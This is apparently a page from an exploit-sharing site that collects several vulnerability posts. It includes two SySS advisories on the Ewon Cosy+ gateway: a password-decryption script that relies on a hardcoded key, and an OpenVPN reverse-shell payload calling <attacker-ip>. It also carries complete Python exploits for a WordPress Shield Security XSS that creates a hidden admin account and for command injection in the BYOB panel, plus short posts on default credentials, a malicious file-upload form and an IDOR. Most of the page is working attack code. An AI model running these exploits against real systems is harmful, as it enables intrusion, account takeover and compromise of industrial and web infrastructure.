Latest exploits :: CodePwn

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-032 Product: Ewon Cosy+ Manufacturer: HMS Industrial Networks AB Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3 Tested Version(s): Firmware Version: 21.2s7 Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2024-04-10 Solution Date: 2024-07-18 Public Disclosure: 2024-08-11 CVE Reference: CVE-2024-33895 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to the use of a hardcoded cryptographic key, an attacker is able to decrypt encrypted data and retrieve sensitive information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Ewon Cosy+ stores sensitive data such as passwords in an encrypted format. These values are included, e.g., in configuration backups. However, a symmetric encryption algorithm (AES-CBC-256) with hardcoded and static cryptographic keys is used. Thus, an attacker is able to decrypt that data and retrieve sensitive information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): By analyzing the ELF executable "ewon" of an Ewon Cosy+ in a disassembler and decompiler, e.g. Ghidra, the encryption mechanism could be reversed and the hardcoded cryptographic key could be extracted. Used encryption algorithm: AES in CBC mode with a key length of 256 bit A simple Python script was developed to decrypt encrypted values: ******************** import base64 import sys from Crypto.Cipher import AES from binascii import unhexlify def pad(text): padding_length = AES.block_size - (len(text) % AES.block_size) padded_text = text + bytes([padding_length] * padding_length) return padded_text, padding_length encoded_text = sys.argv[1] key_hex = "6367b0 [...]" # redacted iv_hex = "28c9 [...]" # redacted key = unhexlify(key_hex) iv = unhexlify(iv_hex) decoded_text = base64.b64decode(encoded_text[4:]) padded_text, padding_length = pad(decoded_text) cipher = AES.new(key, AES.MODE_CBC, iv) decrypted_text = cipher.decrypt(padded_text) print("Plaintext: {}".format( decrypted_text[1:][:-padding_length-2].decode('utf-8') )) **************** $> python3 decrypt_ewon_pwd.py "#_5_YARU3GSgNcElltjyMMqWfZwb" Plaintext: adm:123 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to the manufacturer note[4], the vulnerability was fixed with the firmware versions 21.2s10 and 22.1s3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-04: Vulnerability discovered 2024-04-10: Vulnerability reported to manufacturer 2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for a publication date for all findings 2024-04-12: Proposed dates for a discussion about publication 2024-04-19: Manufacturer sent a technical overview of planned remediation actions and details about the planned timeline 2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer 2024-05-31: Manufacturer informed that the fix is in completion stage and asked if the blog post[6] can be reviewed by HMS 2024-06-04: Proposed dates to review the blog post draft 2024-06-21: Inquiry about the status 2024-06-21: Received an out-of-office auto reply 2024-07-01: Inquiry about the status 2024-07-04: Inquiry about the status 2024-07-12: Inquiry about the status and letting the manufacturer know that the vulnerability will be published within a talk at DEF CON[7] in August 2024-07-12: Manufacturer responded that the fix is planned by the end of July; manufacturer asked again for reviewing the blog post draft 2024-07-12: Again confirmed reviewing the blog post is possible and asking for the sending of details 2024-07-17: Blog post provided to HMS 2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS 2024-07-23: Inquiry about the status 2024-07-23: Manufacturer reviewed the blog post and confirmed that a fix is provided 2024-07-29: Discussion with HMS about the blog post and final publication actions 2024-08-11: Vulnerability disclosed at DEF CON[7] 2024-08-11: Blog post published[6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Ewon Cosy+ product website https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet [2] SySS Security Advisory SYSS-2024-032 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-032.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Manufacturer note https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf [5] CVE-2024-33895 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33895 [6] Blog post https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/ [7] DEF CON talk https://defcon.org/html/defcon-32/dc-32-speakers.html#54521 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay420ACgkQrgyb+PE0 i1NNyw/9GzNMWrKeghrwqgcJ01f8QJGo1L3ObWscyiMXxqne6Zo8VyIefvGY97hb fZisL4BrzmK+NioLeP3SzM879yGbzU5dca7g5Cqf0qJh9mdU/s6tkgdK+Duz3QdZ 9XPV+ovSDGSDk953fVhHrKUdsns9hMnRIoMkfPxZUm+KWXRIwRguNxl2/q1xxgjt 2kqTldwgwgekKXXp+Uwt5Z8LUG0dU7pHHb3OCizJ81tOCHjwuJA3aUmyBachl4Vc Nw7GwByxoKLTTEfj2CWtkfC4u9UXHUQJBDl51+qRPIVkG2g0jTSQ2AEIubtmi7IA jA/8PK5QONh0GHptj2LzeTqlcEX7834uIE0gHrR5pkFJvgUWoNueEZ9FIHRNZPLX 9Lhu52uiKogX5BVYeRIkbHAxmgf/wojQ4AXE9BMvOgm0HSzjgIaVZ+cqNkMP1ey0 uDXPllHkWtA1IBeffhiVrfc11fLJJczkpN3hRevoa4D6hlNvOYrVUAY869vrJkA2 LHvFwLf1JDQaGiPCkglCcipjtXw+hqGE+zEYOWobXH4cIwdnPUG+VaAks9GcNEdN o6QVfnLTveo8e1u11z8ftguYthMbhOJxVWPBWJv6XhiCXEw8Gh/HonR6LfGQyRTe Fk+qtF1Mih2ZNKnW+XmHHCjtXGgiarfjExVFnhXHbrE8sOHv90I= =/d8q -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-018 Product: Ewon Cosy+ Manufacturer: HMS Industrial Networks AB Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3 Tested Version(s): Firmware Version: 21.2s7 Vulnerability Type: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2024-03-27 Solution Date: 2024-07-18 Public Disclosure: 2024-08-11 CVE Reference: CVE-2024-33896 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to improper neutralization of parameters read from a user-controlled configuration file, an authenticated attacker is able to inject and execute OS commands on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Authenticated attackers are able to upload a custom OpenVPN configuration. This configuration can contain the OpenVPN paramaters "--up" and "--down", which execute a specified script or executable. Since the process itself runs with the highest privileges (root), this allows the device to be completely compromised. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Generate a malicious OpenVPN configuration, e.g. instructing the device to create a reverse shell: client dev tun persist-tun proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet <attacker-ip> 5000 0<$TF | sh 1>$TF"' script-security 2 [...] 2. Start a listener on the attacker system: #> nc -lvp 5000 3. Upload the OpenVPN configuration via FTP to Cosy+. 4. Set the configuration paramater "VPNCfgFile" to "/usr/<vpnfile>". 5. Command is executed by Cosy+ and a reverse shell is initiated: nc -lvp 5000 istening on 0.0.0.0 5000 Connection received on 192.168.10.240 56806 id uid=0(root) gid=0(root) Note: The paramaters "--up" and "--down" need to be specified with two dashes since the values "up" and "down" are blocklisted on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to the manufacturer note[4], the vulnerability was fixed with the firmware versions 21.2s10 and 22.1s3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-03-26: Vulnerability discovered 2024-03-27: Vulnerability reported to manufacturer 2024-04-02: Inquiry about the status 2024-04-05: Manufacturer acknowlegded the vulnerability and started the analysis 2024-04-10: Two more vulnerabilities reported to the manufacturer (SYSS-2024-032 and SYSS-2024-033) 2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for a publication date for all findings 2024-04-12: Proposed dates for a discussion about publication 2024-04-15: Manufacturer sent a technical overview of planned remediation actions and details about the planned timeline 2024-04-15: Acknowlegded the remediation actions and asked the manufacturer for assigning a CVE ID 2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer 2024-05-31: Manufacturer informed that the fix is in completion stage and asked if the blog post[6] can be reviewed by HMS 2024-06-04: Proposed dates to review the blog post draft 2024-06-21: Inquiry about the status 2024-06-21: Received an out-of-office auto reply 2024-07-01: Inquiry about the status 2024-07-04: Inquiry about the status 2024-07-12: Inquiry about the status and letting the manufacturer know that the vulnerability will be published within a talk at DEF CON[7] in August 2024-07-12: Manufacturer responded that the fix is planned by the end of July; manufacturer asked again for reviewing the blog post draft 2024-07-12: Again confirmed reviewing the blog post is possible and asking for the sending of details 2024-07-17: Blog post provided to HMS 2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS 2024-07-23: Inquiry about the status 2024-07-23: Manufacturer reviewed the blog post and confirmed that a fix is provided 2024-07-29: Discussion with HMS about the blog post and final publication actions 2024-08-11: Vulnerability disclosed at DEF CON[7] 2024-08-11: Blog post published[6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Ewon Cosy+ product website https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet [2] SySS Security Advisory SYSS-2024-018 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-018.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Manufacturer note https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf [5] CVE-2024-33896 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33896 [6] Blog post https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/ [7] DEF CON talk https://defcon.org/html/defcon-32/dc-32-speakers.html#54521 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay41IACgkQrgyb+PE0 i1PIhQ//YBS1kK+SZAdwVcRCA1fPxKdfHVlHswwiQzyNWvTso35HsQm+cYOJd/zL gb9JJ0VqgohVezL9UVJhkbEVZbUNwAX13XpcjQimsxcVgx5jCus/4JUCH3+9vPCx lZyc+r5gzP7d3/a1sfGO739bkg8+itkp9jxhoZm5WOA+eg5Tz1j4tJN4uU79ikax 5HGubG3dxWq2EQPeEa4+eyKgQCRQTZzX+fiyqfSbRMQq7v4/GbMqH3FtI1CzxoZ3 HfsxQyPu3eUjQuykpMauwuwSgs11Yop9EBDzTuH1+OTmWUMy9exWmixcj/Sst+D9 6rHQkY+CozFy0ml4mQtp/CpN+Jj0op+BtSw1ILwLUL3aqXa96Ud+62ht9EDBQn/9 repfcR5hx9Lj9gfrn46ciW8S/Zy5PghYjOvxC75rsiU3ZHhp/aNF9uKgrdnbZGQe +CzompLF3pM8bCSwtUEauEfK+XArUg0oiN/d2Dl3LMqHJoK4Q1DkgD5v4POmtHsM HaSuE0i57fezwnELg5XNLKRpno57I4LEn1CWm4qebyJvAkodO32DGWAx+Qfh34tG R3Lj71uH1ffepHxMzPsW1WHHnOqjsXQIYw6yq6eJqHwS/ygR/OTVnGri5e4Xq/tN AZyo5WrR3iTmZMBhPAaDoLfclUG4IucGdJKGop9IKkeNTHXkuGk= =75wq -----END PGP SIGNATURE----- </code></pre>

<pre><code># Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation # Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK) # Date: 16/08/2024 # Exploit Author: Tim Lepp # Vendor Homepage: https://getshieldsecurity.com/ # Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5) # Version: <20.0.6 # Tested on: Ubuntu # CVE : CVE-2024-7313 How It Works * The script first checks if the target WordPress installation is using a vulnerable version of the Shield Security plugin by examining the response from the wp-login.php page. * If the plugin version is vulnerable, it proceeds to generate a reflected XSS payload that, when executed, will create a new admin user with a hardcoded password as WordPress wont accept weak passwords without user intervention. * The payload is created to first use a GET request to dynamically find the WordPress nonce used for account creation, then use that nonce to submit a POST request to the user creation endpoint with the details of the new user given in the script. * The payload is then URL-encoded and displayed for use in the attack. * Once sent to an administrator of the site and the link is clicked, a new Administrator user will be created on the site with the details parsed by the script. This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background. Reference https://research.cleantalk.org/cve-2024-7313/ Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main --- code --- import sys import urllib.parse import requests from bs4 import BeautifulSoup # Color codes for terminal output red = '\033[91m' green = '\033[92m' yellow = '\033[93m' blue = '\033[96m' purple = '\033[95m' reset = '\033[0m' # Banner and vulnerability information - Displayed at the start of the script def print_banner(): print(f"""{red} ############################################################################# # # # # # ______ _______ ____ ___ ____ _ _ _____ _____ _ _____ # # / ___\ \ / | ____| |___ \ / _ |___ \| || | |___ |___ // |___ / # # | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ / / |_ \| | |_ \ # # | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ / ___) | |___) | # # \____| \_/ |_____| |_____|\___|_____| |_| /_/ |____/|_|____/ # # # # Shield Security Plugin Vulnerability (CVE-2024-7313) # # Reflected XSS in WordPress Shield Security Plugin # # Versions Affected: < 20.0.6 # # Risk: High # # Discovered by: Wayne-Kerr # # Published: August 7, 2024 # ############################################################################# {reset}""") # Help menu - Provides instructions when '-h' or '--help' is used def print_help(): print(f"""{yellow} Usage: python3 exploit.py <target_url> Example: python3 exploit.py http://example.com Options: -h, --help Show this help message and exit {reset}""") # Format the target URL - Ensures the URL starts with "http://" or "https://" def format_target_url(target_url): if target_url.startswith("http://") or target_url.startswith("https://"): return target_url else: return f"http://{target_url}" # Check if the target is vulnerable by accessing the wp-login.php page def check_vulnerability(target_url): try: response = requests.get(f"{target_url}/wp-login.php") if response.status_code == 200: # Try to extract version information from the response version_info = response.text.split("ver=")[-1].split("\"")[0] version = version_info.split(".") major_version = int(version[0]) minor_version = int(version[1]) patch_version = int(version[2].split('&')[0]) # Check if the version is below 20.0.6 if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6): print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}") return True else: print(f"{yellow}Version not vulnerable.{reset}") return False else: print(f"{red}Failed to retrieve the version information.{reset}") return False except Exception as e: print(f"{red}Error occurred while checking vulnerability: {e}{reset}") return False # Generate the XSS payload URL that exploits the vulnerability def generate_xss_payload(target_url, username, email, first_name, last_name): # Hardcoded password for the new admin account to be created hardcoded_password = "HaxorStrongAFPassword123!!" # The payload template for the XSS attack payload_template = ( "var xhrNonce = new XMLHttpRequest(); " "xhrNonce.open('GET', '/wp-admin/user-new.php', true); " "xhrNonce.onload = function() {{ " "if (xhrNonce.status === 200) {{ " "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; " "var xhr = new XMLHttpRequest(); " "xhr.open('POST', '/wp-admin/user-new.php', true); " "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); " "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); " "xhr.setRequestHeader('Origin', '{target}'); " "var params = 'action=createuser&_wpnonce_create-user=' + nonce + " "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" "&user_login={username}&email={email}" "&first_name={first_name}&last_name={last_name}&url=test" "&pass1={password}&pass2={password}&role=administrator" "&createuser=Add+New+User'; " "xhr.send(params); " "xhr.onload = function() {{ " "if (xhr.status == 200) {{ " "console.log('Admin user created successfully'); " "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; " "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} " "}}; " "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; " "xhrNonce.send();" ) # Formatting the payload with the provided details payload = payload_template.format( target=target_url, username=username, email=urllib.parse.quote(email), first_name=first_name, last_name=last_name, password=urllib.parse.quote(hardcoded_password) ) # URL encode the payload and generate the full URL for the XSS attack encoded_payload = urllib.parse.quote(f"<script>{payload}</script>") full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}" return full_url if __name__ == "__main__": try: # Print the banner print_banner() # Check for help menu flag and print help if necessary if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']: print_help() sys.exit(0) # Get the target URL from the command-line argument raw_target_url = sys.argv[1] target_url = format_target_url(raw_target_url) # Check if the target is vulnerable if not check_vulnerability(target_url): sys.exit(1) # Get user input for the new admin account details username = input(f"{blue}Enter username: {reset}") email = input(f"{blue}Enter email: {reset}") first_name = input(f"{blue}Enter first name: {reset}") last_name = input(f"{blue}Enter last name: {reset}") # Display the hardcoded password hardcoded_password = "HaxorStrongAFPassword123!!" print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}") # Generate and display the XSS payload URL xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name) print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}") # Handle keyboard interruption except KeyboardInterrupt: print(f"\n{red}Script interrupted by user.{reset}") sys.exit(1) # Catch any other exceptions and display an error message except Exception as e: print(f"{red}An error occurred: {e}{reset}") sys.exit(1) </code></pre>

<pre><code># Exploit Title: BYOB (Build Your Own Botnet) v2.0.0 Unauthenticated RCE (Remote Code Execution) # Date: 2024-08-14 # Exploit Author: @_chebuya # Software Link: https://github.com/malwaredllc/byob # Version: v2.0.0 # Tested on: Ubuntu 22.04 LTS, Python 3.10.12, change numpy==1.17.3->numpy # CVE: CVE-2024-?????, CVE-2024-????? # Description: This exploit works by spoofing an agent callback to overwrite the sqlite database and bypass authentication, then exploiting an authenticated command injection in the payload builder page # Github: # Blog: import sys import json import base64 import string import random import argparse import requests from bs4 import BeautifulSoup def get_csrf(session, url): r = session.get(url) soup = BeautifulSoup(r.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] return csrf_token def upload_database(session, url, filename): with open('database.db', 'rb') as f: bindata = f.read() data = base64.b64encode(bindata).decode('ascii') json_data = {'data': data, 'filename': filename, 'type': "txt", 'owner': "admin", "module": "icloud", "session": "lol"} headers = { 'Content-Length': str(len(json.dumps(json_data))) } print("[***] Uploading database") upload_response = session.post(f"{url}/api/file/add", data=json_data, headers=headers) print(upload_response.status_code) return upload_response.status_code def exploit(url, username, password, user_agent, command): s = requests.Session() # This is to ensure reliability, as the application cwd might change depending on the stage of the docker run process filepaths = ["/proc/self/cwd/buildyourownbotnet/database.db", "/proc/self/cwd/../buildyourownbotnet/database.db", "/proc/self/cwd/../../../../buildyourownbotnet/database.db", "/proc/self/cwd/instance/database.db", "/proc/self/cwd/../../../../instance/database.db", "/proc/self/cwd/../instance/database.db"] failed = True for filepath in filepaths: if upload_database(s, url, filepath) != 500: failed = False break if failed: print("[!!!] Failed to upload database, exiting") sys.exit(1) if password is None: password = ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(32)]) print(username + ":" + password) register_csrf = get_csrf(s, f'{url}/register') headers = { 'User-Agent': user_agent, 'Content-Type': 'application/x-www-form-urlencoded', } data = { 'csrf_token': register_csrf, 'username': username, 'password': password, 'confirm_password': password, 'submit': 'Sign Up' } print("[***] Registering user ") regsiter_response = s.post(f'{url}/register', headers=headers, data=data) print(regsiter_response.status_code) login_csrf = get_csrf(s, f'{url}/login') data = { 'csrf_token': login_csrf, 'username': username, 'password': password, 'submit': 'Log In' } print("[***] Logging in") login_response = s.post(f'{url}/login', headers=headers, data=data) print(login_response.status_code) headers = { 'User-Agent': user_agent, 'Content-Type': 'application/x-www-form-urlencoded', } data = f'format=exe&operating_system=nix$({command})&architecture=amd64' try: s.post(f'{url}/api/payload/generate', headers=headers, data=data, stream=True, timeout=0.0000000000001) except requests.exceptions.ReadTimeout: pass parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help="The target URL of the BYOB admin panel", required=True) parser.add_argument("-u", "--username", help="The username to set for the new admin account", default='admin') parser.add_argument("-p", "--password", help="The password to set for the new admin account", default=None) parser.add_argument("-A", "--user-agent", help="The user-agent to use for requests", default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36') parser.add_argument("-c", "--command", help="The command to execute on the BYOB server", required=True) args = parser.parse_args() exploit(args.target.rstrip("/"), args.username, args.password, args.user_agent, args.command) </code></pre>

<pre><code>==================================================================================================================================== | # Title : Insurance 1.2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://demo.phpscriptpoint.com/insurance/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@gmail.com & pass = 1234 [+] https://www/127.0.0.1/demo/phpscriptpointcom/insurance/admin Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>============================================================================================================================================= | # Title : Hotel Booking System 1.0 Remote File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to remotely upload malicious PHP files directly. [+] Line 9 set url of target. [+] The path to upload the files : http://127.0.0.1/hotel/uploadImage\Profile [+] Save Code as html : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Image Upload Form</title> </head> <body> <form action="http://127.0.0.1/source%20code/profile.php" method="POST" enctype="multipart/form-data"> <label for="image">Upload an image:</label> <input type="file" id="image" name="image" accept="image/*" required> <button type="submit" name="btn_update">Upload</button> </form> </body> </html> [+] part 2 : infected item ( manage_website.php ) . [+] Line 9 set url of target. <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Update Website Images</title> </head> <body> <form action="http://127.0.0.1/source%20code/manage_website.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="old_website_image" value="current_website_image.jpg"> <label for="website_image">Upload new website image:</label> <input type="file" id="website_image" name="website_image" accept="image/*"> <input type="hidden" name="old_login_image" value="current_login_image.jpg"> <label for="login_image">Upload new login image:</label> <input type="file" id="login_image" name="login_image" accept="image/*"> <input type="hidden" name="old_back_login_image" value="current_back_login_image.jpg"> <label for="back_login_image">Upload new back login image:</label> <input type="file" id="back_login_image" name="back_login_image" accept="image/*"> <button type="submit" name="btn_web">Update Images</button> </form> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bhojon restaurant management system v3.0 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /dashboard/autoupdate [+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdate Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>